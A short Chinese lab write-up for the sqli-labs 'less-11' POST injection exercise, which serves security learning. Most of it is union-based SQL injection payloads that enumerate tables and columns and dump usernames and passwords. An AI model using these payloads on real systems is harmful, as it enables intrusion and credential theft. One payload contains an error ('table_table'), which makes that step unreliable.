前言
作者简介:不知名白帽,网络安全学习者。
目录
less-11(POST注入)
1.send to Repeater
2.单引号报错
3. 查库名
aadmin' union select user(),database()--
4.查表名
aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--
5.查段名
aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_table='users'--
6.查数据
aadmin' union select 1,group_concat(username,':',password) from users --
7.用查到的数据Dumb登录
